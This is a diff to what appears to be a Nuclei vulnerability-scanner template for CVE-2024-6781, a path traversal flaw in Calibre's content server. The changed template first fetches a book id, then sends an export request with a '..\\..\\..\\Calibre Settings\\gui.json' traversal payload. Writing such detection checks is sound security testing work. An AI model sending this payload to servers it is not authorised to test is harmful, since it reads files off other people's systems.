diff --git a/http/cves/2024/CVE-2024-6781.yaml b/http/cves/2024/CVE-2024-6781.yaml
index 4cb25e1136..01a135a51b 100644
--- a/http/cves/2024/CVE-2024-6781.yaml
+++ b/http/cves/2024/CVE-2024-6781.yaml
@@ -16,25 +16,39 @@ info:
   tags: cve,cve2024,calibre,lfi
 
 http:
+  - raw:
+      - |
+        GET /interface-data/books-init HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: json
+        name: book_ids
+        internal: true
+        json:
+          - '.search_result.book_ids[0]'
+
   - raw:
       - |
         POST /cdb/cmd/export HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 
-        ["extra_file", 1, "..\\..\\..\\Calibre Settings\\gui.json", ""]
+        ["extra_file", {{book_ids}}, "..\\..\\..\\Calibre Settings\\gui.json", ""]
 
     matchers-condition: and
     matchers:
       - type: word
-        part: header
+        part: content_type
         words:
           - "application/json"
 
       - type: word
         part: body
         words:
-          - "label"
+          - "No such file or directory:"
+          - "Traceback"
+        condition: and
 
       - type: status
         status: